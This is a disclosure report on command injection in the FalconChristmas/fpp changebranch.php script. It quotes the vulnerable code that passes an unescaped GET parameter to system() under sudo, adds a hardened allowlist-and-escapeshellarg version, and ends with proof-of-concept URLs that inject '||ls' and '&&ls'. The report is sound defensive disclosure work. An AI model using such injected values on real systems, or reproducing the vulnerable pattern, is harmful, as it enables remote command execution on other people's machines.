OS Command Injection in FalconChristmas/fpp

Valid
Reported on May 29th 2021

✍️ Description

Hi, there is a command injection vulnerability in https://github.com/FalconChristmas/fpp/blob/40a636c6e38442e3674db0b85fdfc5ed8a79b823/www/changebranch.php#L23

<?php
    echo "==================================================================================\n";

    $branch = $_GET['branch'];
    $command = "sudo /opt/fpp/scripts/git_branch " . $branch . " 2>&1";

    echo "Command: $command\n";
    echo "----------------------------------------------------------------------------------\n";
    system($command);
    echo "\n";
?>

system() is called on user input taken straight from $_GET['branch'] without any filtering or escaping, so shell metacharacters in the branch parameter are interpreted by the shell.
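As an added example (not FalconChristmas/fpp's own code or fix), this is what a hardened version of the handler above looks like. The script path /opt/fpp/scripts/git_branch and the branch parameter name come from the report; the allowlist rules for branch names are an assumption modelled on git's reference-name constraints. The value is first checked against a strict allowlist and then still passed through escapeshellarg() as a second layer.

```php
<?php
// Added example, not the project's code: hardened changebranch.php handler.
// The validation rules below are assumptions based on git ref-name rules.

// Allowlist check: only characters that can appear in a branch name, no leading
// '-' (prevents option injection into git_branch), no '..' and no trailing '/'
// or '.lock', which git refuses in ref names anyway.
function isSafeBranchName(string $branch): bool
{
    if ($branch === '' || strlen($branch) > 255) {
        return false;
    }
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._\/-]*$/', $branch)) {
        return false;
    }
    if (strpos($branch, '..') !== false
        || substr($branch, -1) === '/'
        || substr($branch, -5) === '.lock') {
        return false;
    }
    return true;
}

// Build the command with the argument quoted for the shell. escapeshellarg()
// wraps the value in single quotes and escapes embedded quotes, so even a value
// that slipped past the allowlist could not terminate the command or add one.
function buildBranchCommand(string $branch): string
{
    return 'sudo /opt/fpp/scripts/git_branch ' . escapeshellarg($branch) . ' 2>&1';
}

$branch = $_GET['branch'] ?? '';

if (!isSafeBranchName($branch)) {
    http_response_code(400);
    echo "Invalid branch name\n";
    exit;
}

echo "==================================================================================\n";
$command = buildBranchCommand($branch);
// Escape the echoed command for HTML so the page does not reflect raw input.
echo "Command: " . htmlspecialchars($command, ENT_QUOTES, 'UTF-8') . "\n";
echo "----------------------------------------------------------------------------------\n";
system($command);
echo "\n";
?>
```

With this version the two payloads from the proof of concept (`||ls` and `&&ls`) are rejected by isSafeBranchName() before any command is built, because they start with a non-alphanumeric character and contain `|` or `&`. Even without the allowlist, escapeshellarg() would turn them into a single quoted argument rather than a second command. The allowlist matters because the script runs under sudo: the shell layer is only one place a crafted argument can do harm, and a name beginning with `-` could still be interpreted as an option by whatever git_branch invokes.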

🕵️‍♂️ Proof of Concept

Visit http://127.0.0.1/changebranch.php?branch=||ls or http://127.0.0.1/changebranch.php?branch=&&ls.

💥 Impact

RCE